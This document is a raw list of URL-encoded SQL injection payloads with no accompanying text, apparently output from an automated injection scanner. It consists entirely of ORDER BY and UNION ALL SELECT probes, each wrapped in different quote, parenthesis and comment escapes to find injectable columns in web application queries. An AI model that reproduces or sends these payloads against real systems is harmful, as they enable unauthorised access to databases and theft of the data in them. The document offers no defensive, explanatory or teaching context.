-7246%27%29%29%29%20UNION%20ALL%20SELECT%206861%2C%206861%2C%206861%2C%206861%2C%206861%2C%206861%2C%206861%23%20AND%20%28%28%28%27bIuq%27%20LIKE%20%27bIuq -1491%27%29%29%29%20UNION%20ALL%20SELECT%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%2C%202097%23%20AND%20%28%28%28%27YlpH%27%20LIKE%20%27YlpH -7212%27%29%29%29%20UNION%20ALL%20SELECT%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%23%20AND%20%28%28%28%27ueYS%27%20LIKE%20%27ueYS -3116%27%29%29%29%20UNION%20ALL%20SELECT%205611%2C%205611%2C%205611%2C%205611%2C%205611%2C%205611%2C%205611%2C%205611%2C%205611%2C%205611%23%20AND%20%28%28%28%27noMk%27%20LIKE%20%27noMk -2272%27%20ORDER%20BY%201%23%20AND%20%27JppB%27%20LIKE%20%27JppB -5691%27%20ORDER%20BY%205562%23%20AND%20%27dCyS%27%20LIKE%20%27dCyS -2651%27%20UNION%20ALL%20SELECT%209471%23%20AND%20%27QNPd%27%20LIKE%20%27QNPd -2016%27%20UNION%20ALL%20SELECT%205899%2C%205899%23%20AND%20%27wdNX%27%20LIKE%20%27wdNX -7894%27%20UNION%20ALL%20SELECT%205832%2C%205832%2C%205832%23%20AND%20%27GLfK%27%20LIKE%20%27GLfK -7691%27%20UNION%20ALL%20SELECT%203282%2C%203282%2C%203282%2C%203282%23%20AND%20%27semX%27%20LIKE%20%27semX -6850%27%20UNION%20ALL%20SELECT%209480%2C%209480%2C%209480%2C%209480%2C%209480%23%20AND%20%27EVjl%27%20LIKE%20%27EVjl -7313%27%20UNION%20ALL%20SELECT%204107%2C%204107%2C%204107%2C%204107%2C%204107%2C%204107%23%20AND%20%27YEXv%27%20LIKE%20%27YEXv -9541%27%20UNION%20ALL%20SELECT%204307%2C%204307%2C%204307%2C%204307%2C%204307%2C%204307%2C%204307%23%20AND%20%27Ybpt%27%20LIKE%20%27Ybpt -6622%27%20UNION%20ALL%20SELECT%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%23%20AND%20%27CCFT%27%20LIKE%20%27CCFT -4790%27%20UNION%20ALL%20SELECT%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%23%20AND%20%27jJIV%27%20LIKE%20%27jJIV -6909%27%20UNION%20ALL%20SELECT%206268%2C%206268%2C%206268%2C%206268%2C%206268%2C%206268%2C%206268%2C%206268%2C%206268%2C%206268%23%20AND%20%27fPdP%27%20LIKE%20%27fPdP -9509%22%29%20ORDER%20BY%201%23%20AND%20%28%22EkRR%22%3D%22EkRR -3048%22%29%20ORDER%20BY%201497%23%20AND%20%28%22tmFo%22%3D%22tmFo -9292%22%29%20UNION%20ALL%20SELECT%205756%23%20AND%20%28%22MKIp%22%3D%22MKIp -7837%22%29%20UNION%20ALL%20SELECT%202559%2C%202559%23%20AND%20%28%22WeSU%22%3D%22WeSU -6674%22%29%20UNION%20ALL%20SELECT%209823%2C%209823%2C%209823%23%20AND%20%28%22Ysun%22%3D%22Ysun -5716%22%29%20UNION%20ALL%20SELECT%209614%2C%209614%2C%209614%2C%209614%23%20AND%20%28%22uYuF%22%3D%22uYuF -8941%22%29%20UNION%20ALL%20SELECT%209482%2C%209482%2C%209482%2C%209482%2C%209482%23%20AND%20%28%22TRbV%22%3D%22TRbV -3119%22%29%20UNION%20ALL%20SELECT%205214%2C%205214%2C%205214%2C%205214%2C%205214%2C%205214%23%20AND%20%28%22EHTc%22%3D%22EHTc -1220%22%29%20UNION%20ALL%20SELECT%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%23%20AND%20%28%22IBVV%22%3D%22IBVV -1907%22%29%20UNION%20ALL%20SELECT%207849%2C%207849%2C%207849%2C%207849%2C%207849%2C%207849%2C%207849%2C%207849%23%20AND%20%28%22GkpY%22%3D%22GkpY -9556%22%29%20UNION%20ALL%20SELECT%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%2C%205925%23%20AND%20%28%22lHlR%22%3D%22lHlR -6968%22%29%20UNION%20ALL%20SELECT%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%2C%207843%23%20AND%20%28%22tcKZ%22%3D%22tcKZ -4226%22%29%29%20ORDER%20BY%201%23%20AND%20%28%28%22jczJ%22%3D%22jczJ -6352%22%29%29%20ORDER%20BY%206516%23%20AND%20%28%28%22oyri%22%3D%22oyri -5691%22%29%29%20UNION%20ALL%20SELECT%208172%23%20AND%20%28%28%22zEua%22%3D%22zEua -8569%22%29%29%20UNION%20ALL%20SELECT%205561%2C%205561%23%20AND%20%28%28%22RJoX%22%3D%22RJoX -9572%22%29%29%20UNION%20ALL%20SELECT%202086%2C%202086%2C%202086%23%20AND%20%28%28%22YWkA%22%3D%22YWkA -3362%22%29%29%20UNION%20ALL%20SELECT%205957%2C%205957%2C%205957%2C%205957%23%20AND%20%28%28%22olea%22%3D%22olea -4078%22%29%29%20UNION%20ALL%20SELECT%202958%2C%202958%2C%202958%2C%202958%2C%202958%23%20AND%20%28%28%22sMhD%22%3D%22sMhD -4757%22%29%29%20UNION%20ALL%20SELECT%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%23%20AND%20%28%28%22aQoQ%22%3D%22aQoQ -3058%22%29%29%20UNION%20ALL%20SELECT%201212%2C%201212%2C%201212%2C%201212%2C%201212%2C%201212%2C%201212%23%20AND%20%28%28%22YUCk%22%3D%22YUCk -9257%22%29%29%20UNION%20ALL%20SELECT%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%2C%209715%23%20AND%20%28%28%22Erjt%22%3D%22Erjt -5039%22%29%29%20UNION%20ALL%20SELECT%206467%2C%206467%2C%206467%2C%206467%2C%206467%2C%206467%2C%206467%2C%206467%2C%206467%23%20AND%20%28%28%22dYHL%22%3D%22dYHL -8057%22%29%29%20UNION%20ALL%20SELECT%204351%2C%204351%2C%204351%2C%204351%2C%204351%2C%204351%2C%204351%2C%204351%2C%204351%2C%204351%23%20AND%20%28%28%22rTyW%22%3D%22rTyW -7022%22%29%29%29%20ORDER%20BY%201%23%20AND%20%28%28%28%22sYLe%22%3D%22sYLe -5389%22%29%29%29%20ORDER%20BY%204502%23%20AND%20%28%28%28%22kwqy%22%3D%22kwqy -7226%22%29%29%29%20UNION%20ALL%20SELECT%204188%23%20AND%20%28%28%28%22TfxE%22%3D%22TfxE -6964%22%29%29%29%20UNION%20ALL%20SELECT%209904%2C%209904%23%20AND%20%28%28%28%22JxiY%22%3D%22JxiY -7934%22%29%29%29%20UNION%20ALL%20SELECT%209947%2C%209947%2C%209947%23%20AND%20%28%28%28%22vkYO%22%3D%22vkYO -1081%22%29%29%29%20UNION%20ALL%20SELECT%203706%2C%203706%2C%203706%2C%203706%23%20AND%20%28%28%28%22nGEc%22%3D%22nGEc -1733%22%29%29%29%20UNION%20ALL%20SELECT%203768%2C%203768%2C%203768%2C%203768%2C%203768%23%20AND%20%28%28%28%22JOOK%22%3D%22JOOK -6799%22%29%29%29%20UNION%20ALL%20SELECT%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%23%20AND%20%28%28%28%22Arje%22%3D%22Arje -8779%22%29%29%29%20UNION%20ALL%20SELECT%203553%2C%203553%2C%203553%2C%203553%2C%203553%2C%203553%2C%203553%23%20AND%20%28%28%28%22uppL%22%3D%22uppL -9070%22%29%29%29%20UNION%20ALL%20SELECT%208508%2C%208508%2C%208508%2C%208508%2C%208508%2C%208508%2C%208508%2C%208508%23%20AND%20%28%28%28%22AsAc%22%3D%22AsAc -9266%22%29%29%29%20UNION%20ALL%20SELECT%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%23%20AND%20%28%28%28%22pLAF%22%3D%22pLAF -4876%22%29%29%29%20UNION%20ALL%20SELECT%208685%2C%208685%2C%208685%2C%208685%2C%208685%2C%208685%2C%208685%2C%208685%2C%208685%2C%208685%23%20AND%20%28%28%28%22wkVA%22%3D%22wkVA -5637%22%20ORDER%20BY%201%23%20AND%20%22ZAlY%22%3D%22ZAlY -6135%22%20ORDER%20BY%209771%23%20AND%20%22oUUy%22%3D%22oUUy -8491%22%20UNION%20ALL%20SELECT%205636%23%20AND%20%22BQhO%22%3D%22BQhO -1992%22%20UNION%20ALL%20SELECT%206133%2C%206133%23%20AND%20%22xJdP%22%3D%22xJdP -4852%22%20UNION%20ALL%20SELECT%202108%2C%202108%2C%202108%23%20AND%20%22zDWe%22%3D%22zDWe -7429%22%20UNION%20ALL%20SELECT%204465%2C%204465%2C%204465%2C%204465%23%20AND%20%22AGjn%22%3D%22AGjn -9606%22%20UNION%20ALL%20SELECT%204448%2C%204448%2C%204448%2C%204448%2C%204448%23%20AND%20%22kscn%22%3D%22kscn -7405%22%20UNION%20ALL%20SELECT%209555%2C%209555%2C%209555%2C%209555%2C%209555%2C%209555%23%20AND%20%22KouE%22%3D%22KouE -8709%22%20UNION%20ALL%20SELECT%201088%2C%201088%2C%201088%2C%201088%2C%201088%2C%201088%2C%201088%23%20AND%20%22DnWy%22%3D%22DnWy -1713%22%20UNION%20ALL%20SELECT%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%23%20AND%20%22cLzg%22%3D%22cLzg -1090%22%20UNION%20ALL%20SELECT%203287%2C%203287%2C%203287%2C%203287%2C%203287%2C%203287%2C%203287%2C%203287%2C%203287%23%20AND%20%22Dqbm%22%3D%22Dqbm -7067%22%20UNION%20ALL%20SELECT%204208%2C%204208%2C%204208%2C%204208%2C%204208%2C%204208%2C%204208%2C%204208%2C%204208%2C%204208%23%20AND%20%22jEmX%22%3D%22jEmX -3241%22%29%20ORDER%20BY%201%23%20AND%20%28%22zWvM%22%20LIKE%20%22zWvM -9239%22%29%20ORDER%20BY%205597%23%20AND%20%28%22hCfU%22%20LIKE%20%22hCfU -1174%22%29%20UNION%20ALL%20SELECT%206339%23%20AND%20%28%22UstG%22%20LIKE%20%22UstG -6484%22%29%20UNION%20ALL%20SELECT%205500%2C%205500%23%20AND%20%28%22LiNp%22%20LIKE%20%22LiNp -5845%22%29%20UNION%20ALL%20SELECT%207225%2C%207225%2C%207225%23%20AND%20%28%22RDke%22%20LIKE%20%22RDke -9651%22%29%20UNION%20ALL%20SELECT%207761%2C%207761%2C%207761%2C%207761%23%20AND%20%28%22mpFv%22%20LIKE%20%22mpFv -3268%22%29%20UNION%20ALL%20SELECT%208689%2C%208689%2C%208689%2C%208689%2C%208689%23%20AND%20%28%22kthf%22%20LIKE%20%22kthf -8294%22%29%20UNION%20ALL%20SELECT%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%23%20AND%20%28%22EuxD%22%20LIKE%20%22EuxD -3963%22%29%20UNION%20ALL%20SELECT%209638%2C%209638%2C%209638%2C%209638%2C%209638%2C%209638%2C%209638%23%20AND%20%28%22RsDV%22%20LIKE%20%22RsDV -6870%22%29%20UNION%20ALL%20SELECT%207224%2C%207224%2C%207224%2C%207224%2C%207224%2C%207224%2C%207224%2C%207224%23%20AND%20%28%22Lzag%22%20LIKE%20%22Lzag -1930%22%29%20UNION%20ALL%20SELECT%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%2C%203443%23%20AND%20%28%22RvWH%22%20LIKE%20%22RvWH -9219%22%29%20UNION%20ALL%20SELECT%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%2C%206815%23%20AND%20%28%22Ujyq%22%20LIKE%20%22Ujyq -9727%22%29%29%20ORDER%20BY%201%23%20AND%20%28%28%22VcDB%22%20LIKE%20%22VcDB -1074%22%29%29%20ORDER%20BY%207552%23%20AND%20%28%28%22lUFc%22%20LIKE%20%22lUFc -3419%22%29%29%20UNION%20ALL%20SELECT%205081%23%20AND%20%28%28%22wyuu%22%20LIKE%20%22wyuu -5323%22%29%29%20UNION%20ALL%20SELECT%207151%2C%207151%23%20AND%20%28%28%22LOgl%22%20LIKE%20%22LOgl -3348%22%29%29%20UNION%20ALL%20SELECT%209033%2C%209033%2C%209033%23%20AND%20%28%28%22rdnm%22%20LIKE%20%22rdnm -7227%22%29%29%20UNION%20ALL%20SELECT%201334%2C%201334%2C%201334%2C%201334%23%20AND%20%28%28%22ADuq%22%20LIKE%20%22ADuq -3917%22%29%29%20UNION%20ALL%20SELECT%204679%2C%204679%2C%204679%2C%204679%2C%204679%23%20AND%20%28%28%22BQhb%22%20LIKE%20%22BQhb -5671%22%29%29%20UNION%20ALL%20SELECT%208157%2C%208157%2C%208157%2C%208157%2C%208157%2C%208157%23%20AND%20%28%28%22uwwH%22%20LIKE%20%22uwwH -3391%22%29%29%20UNION%20ALL%20SELECT%201997%2C%201997%2C%201997%2C%201997%2C%201997%2C%201997%2C%201997%23%20AND%20%28%28%22lnmj%22%20LIKE%20%22lnmj -1511%22%29%29%20UNION%20ALL%20SELECT%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%23%20AND%20%28%28%22kaQI%22%20LIKE%20%22kaQI -6301%22%29%29%20UNION%20ALL%20SELECT%206602%2C%206602%2C%206602%2C%206602%2C%206602%2C%206602%2C%206602%2C%206602%2C%206602%23%20AND%20%28%28%22jJOp%22%20LIKE%20%22jJOp -9624%22%29%29%20UNION%20ALL%20SELECT%204472%2C%204472%2C%204472%2C%204472%2C%204472%2C%204472%2C%204472%2C%204472%2C%204472%2C%204472%23%20AND%20%28%28%22gGhH%22%20LIKE%20%22gGhH -1858%22%29%29%29%20ORDER%20BY%201%23%20AND%20%28%28%28%22uDzI%22%20LIKE%20%22uDzI -1627%22%29%29%29%20ORDER%20BY%204898%23%20AND%20%28%28%28%22sXMQ%22%20LIKE%20%22sXMQ -9054%22%29%29%29%20UNION%20ALL%20SELECT%201577%23%20AND%20%28%28%28%22KFAd%22%20LIKE%20%22KFAd -4087%22%29%29%29%20UNION%20ALL%20SELECT%205495%2C%205495%23%20AND%20%28%28%28%22PJep%22%20LIKE%20%22PJep -1063%22%29%29%29%20UNION%20ALL%20SELECT%208687%2C%208687%2C%208687%23%20AND%20%28%28%28%22KuJc%22%20LIKE%20%22KuJc -6121%22%29%29%29%20UNION%20ALL%20SELECT%203074%2C%203074%2C%203074%2C%203074%23%20AND%20%28%28%28%22XlSV%22%20LIKE%20%22XlSV -8123%22%29%29%29%20UNION%20ALL%20SELECT%207406%2C%207406%2C%207406%2C%207406%2C%207406%23%20AND%20%28%28%28%22YWIA%22%20LIKE%20%22YWIA -9994%22%29%29%29%20UNION%20ALL%20SELECT%203965%2C%203965%2C%203965%2C%203965%2C%203965%2C%203965%23%20AND%20%28%28%28%22eJSp%22%20LIKE%20%22eJSp -5366%22%29%29%29%20UNION%20ALL%20SELECT%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%2C%205779%23%20AND%20%28%28%28%22WenW%22%20LIKE%20%22WenW -1970%22%29%29%29%20UNION%20ALL%20SELECT%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%2C%207143%23%20AND%20%28%28%28%22lvoi%22%20LIKE%20%22lvoi -8758%22%29%29%29%20UNION%20ALL%20SELECT%205973%2C%205973%2C%205973%2C%205973%2C%205973%2C%205973%2C%205973%2C%205973%2C%205973%23%20AND%20%28%28%28%22Ssjw%22%20LIKE%20%22Ssjw -5196%22%29%29%29%20UNION%20ALL%20SELECT%202711%2C%202711%2C%202711%2C%202711%2C%202711%2C%202711%2C%202711%2C%202711%2C%202711%2C%202711%23%20AND%20%28%28%28%22QlPx%22%20LIKE%20%22QlPx -4849%22%20ORDER%20BY%201%23%20AND%20%22iumU%22%20LIKE%20%22iumU -8906%22%20ORDER%20BY%206548%23%20AND%20%22vBMx%22%20LIKE%20%22vBMx -6794%22%20UNION%20ALL%20SELECT%204182%23%20AND%20%22xvVA%22%20LIKE%20%22xvVA -5598%22%20UNION%20ALL%20SELECT%201739%2C%201739%23%20AND%20%22kMrf%22%20LIKE%20%22kMrf -1993%22%20UNION%20ALL%20SELECT%204210%2C%204210%2C%204210%23%20AND%20%22tdXd%22%20LIKE%20%22tdXd -7714%22%20UNION%20ALL%20SELECT%207691%2C%207691%2C%207691%2C%207691%23%20AND%20%22SUTt%22%20LIKE%20%22SUTt -7713%22%20UNION%20ALL%20SELECT%208352%2C%208352%2C%208352%2C%208352%2C%208352%23%20AND%20%22niJv%22%20LIKE%20%22niJv -5924%22%20UNION%20ALL%20SELECT%202120%2C%202120%2C%202120%2C%202120%2C%202120%2C%202120%23%20AND%20%22HoHf%22%20LIKE%20%22HoHf -4244%22%20UNION%20ALL%20SELECT%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%23%20AND%20%22vwBs%22%20LIKE%20%22vwBs -5751%22%20UNION%20ALL%20SELECT%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%23%20AND%20%22CkkT%22%20LIKE%20%22CkkT -1373%22%20UNION%20ALL%20SELECT%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%23%20AND%20%22vKKv%22%20LIKE%20%22vKKv -3151%22%20UNION%20ALL%20SELECT%206019%2C%206019%2C%206019%2C%206019%2C%206019%2C%206019%2C%206019%2C%206019%2C%206019%2C%206019%23%20AND%20%22fQzz%22%20LIKE%20%22fQzz -4111%29%20WHERE%201115%3D1115%20ORDER%20BY%201%23 -6495%29%20WHERE%208811%3D8811%20ORDER%20BY%207703%23 -6139%29%20WHERE%209704%3D9704%20UNION%20ALL%20SELECT%209704%23 -4605%29%20WHERE%202493%3D2493%20UNION%20ALL%20SELECT%202493%2C%202493%23 -7904%29%20WHERE%202455%3D2455%20UNION%20ALL%20SELECT%202455%2C%202455%2C%202455%23 -7447%29%20WHERE%208422%3D8422%20UNION%20ALL%20SELECT%208422%2C%208422%2C%208422%2C%208422%23 -6797%29%20WHERE%206443%3D6443%20UNION%20ALL%20SELECT%206443%2C%206443%2C%206443%2C%206443%2C%206443%23 -6654%29%20WHERE%201795%3D1795%20UNION%20ALL%20SELECT%201795%2C%201795%2C%201795%2C%201795%2C%201795%2C%201795%23 -1681%29%20WHERE%203236%3D3236%20UNION%20ALL%20SELECT%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%23 -2464%29%20WHERE%203887%3D3887%20UNION%20ALL%20SELECT%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%2C%203887%23 -8861%29%20WHERE%205721%3D5721%20UNION%20ALL%20SELECT%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%2C%205721%23 -9697%29%20WHERE%201347%3D1347%20UNION%20ALL%20SELECT%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%2C%201347%23 -1850%27%29%20WHERE%201983%3D1983%20ORDER%20BY%201%23 -9440%27%29%20WHERE%203544%3D3544%20ORDER%20BY%207468%23 -6363%27%29%20WHERE%203177%3D3177%20UNION%20ALL%20SELECT%203177%23 -6136%27%29%20WHERE%209187%3D9187%20UNION%20ALL%20SELECT%209187%2C%209187%23 -3531%27%29%20WHERE%201883%3D1883%20UNION%20ALL%20SELECT%201883%2C%201883%2C%201883%23 -4757%27%29%20WHERE%206893%3D6893%20UNION%20ALL%20SELECT%206893%2C%206893%2C%206893%2C%206893%23 -8265%27%29%20WHERE%206695%3D6695%20UNION%20ALL%20SELECT%206695%2C%206695%2C%206695%2C%206695%2C%206695%23 -3321%27%29%20WHERE%203267%3D3267%20UNION%20ALL%20SELECT%203267%2C%203267%2C%203267%2C%203267%2C%203267%2C%203267%23 -8709%27%29%20WHERE%203251%3D3251%20UNION%20ALL%20SELECT%203251%2C%203251%2C%203251%2C%203251%2C%203251%2C%203251%2C%203251%23 -6380%27%29%20WHERE%202874%3D2874%20UNION%20ALL%20SELECT%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%23 -7718%27%29%20WHERE%201006%3D1006%20UNION%20ALL%20SELECT%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%23 -1697%27%29%20WHERE%204016%3D4016%20UNION%20ALL%20SELECT%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%2C%204016%23 -1350%27%20WHERE%207746%3D7746%20ORDER%20BY%201%23 -6944%27%20WHERE%201049%3D1049%20ORDER%20BY%207486%23 -5771%27%20WHERE%206736%3D6736%20UNION%20ALL%20SELECT%206736%23 -2751%27%20WHERE%206466%3D6466%20UNION%20ALL%20SELECT%206466%2C%206466%23 -8767%27%20WHERE%204142%3D4142%20UNION%20ALL%20SELECT%204142%2C%204142%2C%204142%23 -8387%27%20WHERE%208046%3D8046%20UNION%20ALL%20SELECT%208046%2C%208046%2C%208046%2C%208046%23 -5225%27%20WHERE%207906%3D7906%20UNION%20ALL%20SELECT%207906%2C%207906%2C%207906%2C%207906%2C%207906%23 -5278%27%20WHERE%204877%3D4877%20UNION%20ALL%20SELECT%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%23 -4894%27%20WHERE%206569%3D6569%20UNION%20ALL%20SELECT%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%23 -5599%27%20WHERE%205868%3D5868%20UNION%20ALL%20SELECT%205868%2C%205868%2C%205868%2C%205868%2C%205868%2C%205868%2C%205868%2C%205868%23 -5216%27%20WHERE%207136%3D7136%20UNION%20ALL%20SELECT%207136%2C%207136%2C%207136%2C%207136%2C%207136%2C%207136%2C%207136%2C%207136%2C%207136%23 -8512%27%20WHERE%205947%3D5947%20UNION%20ALL%20SELECT%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%23 -7597%22%20WHERE%206580%3D6580%20ORDER%20BY%201%23 -3676%22%20WHERE%202685%3D2685%20ORDER%20BY%203868%23 -1909%22%20WHERE%206153%3D6153%20UNION%20ALL%20SELECT%206153%23 -5242%22%20WHERE%207711%3D7711%20UNION%20ALL%20SELECT%207711%2C%207711%23 -2436%22%20WHERE%202989%3D2989%20UNION%20ALL%20SELECT%202989%2C%202989%2C%202989%23 -7301%22%20WHERE%209323%3D9323%20UNION%20ALL%20SELECT%209323%2C%209323%2C%209323%2C%209323%23 -1265%22%20WHERE%201708%3D1708%20UNION%20ALL%20SELECT%201708%2C%201708%2C%201708%2C%201708%2C%201708%23 -5169%22%20WHERE%208514%3D8514%20UNION%20ALL%20SELECT%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%23 -9026%22%20WHERE%208595%3D8595%20UNION%20ALL%20SELECT%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%23 -5060%22%20WHERE%202508%3D2508%20UNION%20ALL%20SELECT%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%23 -6806%22%20WHERE%203029%3D3029%20UNION%20ALL%20SELECT%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%23 -8400%22%20WHERE%206757%3D6757%20UNION%20ALL%20SELECT%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%23 -7208%27%20%7C%7C%20%28SELECT%203611%20FROM%20DUAL%20WHERE%206519%3D6519%20ORDER%20BY%201%23%20%29%20%7C%7C%20%27 -8828%27%20%7C%7C%20%28SELECT%206039%20FROM%20DUAL%20WHERE%207209%3D7209%20ORDER%20BY%205747%23%20%29%20%7C%7C%20%27 -6079%27%20%7C%7C%20%28SELECT%205740%20FROM%20DUAL%20WHERE%204402%3D4402%20UNION%20ALL%20SELECT%204402%23%20%29%20%7C%7C%20%27 -8823%27%20%7C%7C%20%28SELECT%208688%20FROM%20DUAL%20WHERE%203207%3D3207%20UNION%20ALL%20SELECT%203207%2C%203207%23%20%29%20%7C%7C%20%27 -1409%27%20%7C%7C%20%28SELECT%204040%20FROM%20DUAL%20WHERE%208926%3D8926%20UNION%20ALL%20SELECT%208926%2C%208926%2C%208926%23%20%29%20%7C%7C%20%27 -7364%27%20%7C%7C%20%28SELECT%207604%20FROM%20DUAL%20WHERE%205494%3D5494%20UNION%20ALL%20SELECT%205494%2C%205494%2C%205494%2C%205494%23%20%29%20%7C%7C%20%27 -2452%27%20%7C%7C%20%28SELECT%208640%20FROM%20DUAL%20WHERE%205381%3D5381%20UNION%20ALL%20SELECT%205381%2C%205381%2C%205381%2C%205381%2C%205381%23%20%29%20%7C%7C%20%27 -1656%27%20%7C%7C%20%28SELECT%205027%20FROM%20DUAL%20WHERE%201677%3D1677%20UNION%20ALL%20SELECT%201677%2C%201677%2C%201677%2C%201677%2C%201677%2C%201677%23%20%29%20%7C%7C%20%27 -7888%27%20%7C%7C%20%28SELECT%209962%20FROM%20DUAL%20WHERE%206451%3D6451%20UNION%20ALL%20SELECT%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%23%20%29%20%7C%7C%20%27 -1164%27%20%7C%7C%20%28SELECT%206198%20FROM%20DUAL%20WHERE%205545%3D5545%20UNION%20ALL%20SELECT%205545%2C%205545%2C%205545%2C%205545%2C%205545%2C%205545%2C%205545%2C%205545%23%20%29%20%7C%7C%20%27 -6242%27%20%7C%7C%20%28SELECT%202629%20FROM%20DUAL%20WHERE%207956%3D7956%20UNION%20ALL%20SELECT%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%23%20%29%20%7C%7C%20%27 -9277%27%20%7C%7C%20%28SELECT%208504%20FROM%20DUAL%20WHERE%209002%3D9002%20UNION%20ALL%20SELECT%209002%2C%209002%2C%209002%2C%209002%2C%209002%2C%209002%2C%209002%2C%209002%2C%209002%2C%209002%23%20%29%20%7C%7C%20%27 -8670%27%20%7C%7C%20%28SELECT%206935%20WHERE%202837%3D2837%20ORDER%20BY%201%23%20%29%20%7C%7C%20%27 -7350%27%20%7C%7C%20%28SELECT%207274%20WHERE%209696%3D9696%20ORDER%20BY%205707%23%20%29%20%7C%7C%20%27 -9594%27%20%7C%7C%20%28SELECT%203518%20WHERE%208763%3D8763%20UNION%20ALL%20SELECT%208763%23%20%29%20%7C%7C%20%27 -6000%27%20%7C%7C%20%28SELECT%208598%20WHERE%209779%3D9779%20UNION%20ALL%20SELECT%209779%2C%209779%23%20%29%20%7C%7C%20%27 -5875%27%20%7C%7C%20%28SELECT%202098%20WHERE%204064%3D4064%20UNION%20ALL%20SELECT%204064%2C%204064%2C%204064%23%20%29%20%7C%7C%20%27 -8898%27%20%7C%7C%20%28SELECT%201913%20WHERE%202756%3D2756%20UNION%20ALL%20SELECT%202756%2C%202756%2C%202756%2C%202756%23%20%29%20%7C%7C%20%27 -6003%27%20%7C%7C%20%28SELECT%204005%20WHERE%209550%3D9550%20UNION%20ALL%20SELECT%209550%2C%209550%2C%209550%2C%209550%2C%209550%23%20%29%20%7C%7C%20%27 -1446%27%20%7C%7C%20%28SELECT%206348%20WHERE%203480%3D3480%20UNION%20ALL%20SELECT%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%23%20%29%20%7C%7C%20%27 -4126%27%20%7C%7C%20%28SELECT%205628%20WHERE%208191%3D8191%20UNION%20ALL%20SELECT%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%2C%208191%23%20%29%20%7C%7C%20%27 -7163%27%20%7C%7C%20%28SELECT%201749%20WHERE%206169%3D6169%20UNION%20ALL%20SELECT%206169%2C%206169%2C%206169%2C%206169%2C%206169%2C%206169%2C%206169%2C%206169%23%20%29%20%7C%7C%20%27 -3754%27%20%7C%7C%20%28SELECT%208680%20WHERE%209205%3D9205%20UNION%20ALL%20SELECT%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%2C%209205%23%20%29%20%7C%7C%20%27 -2995%27%20%7C%7C%20%28SELECT%201782%20WHERE%204203%3D4203%20UNION%20ALL%20SELECT%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%23%20%29%20%7C%7C%20%27 -7328%20%2B%20%28SELECT%209375%20FROM%20DUAL%20WHERE%205260%3D5260%20ORDER%20BY%201%23%20%29 -9829%20%2B%20%28SELECT%201388%20FROM%20DUAL%20WHERE%207353%3D7353%20ORDER%20BY%203692%23%20%29 -5063%20%2B%20%28SELECT%203935%20FROM%20DUAL%20WHERE%206213%3D6213%20UNION%20ALL%20SELECT%206213%23%20%29 -8778%20%2B%20%28SELECT%209490%20FROM%20DUAL%20WHERE%208799%3D8799%20UNION%20ALL%20SELECT%208799%2C%208799%23%20%29 -7674%20%2B%20%28SELECT%207251%20FROM%20DUAL%20WHERE%204833%3D4833%20UNION%20ALL%20SELECT%204833%2C%204833%2C%204833%23%20%29 -4541%20%2B%20%28SELECT%204722%20FROM%20DUAL%20WHERE%206301%3D6301%20UNION%20ALL%20SELECT%206301%2C%206301%2C%206301%2C%206301%23%20%29 -4804%20%2B%20%28SELECT%201999%20FROM%20DUAL%20WHERE%204979%3D4979%20UNION%20ALL%20SELECT%204979%2C%204979%2C%204979%2C%204979%2C%204979%23%20%29 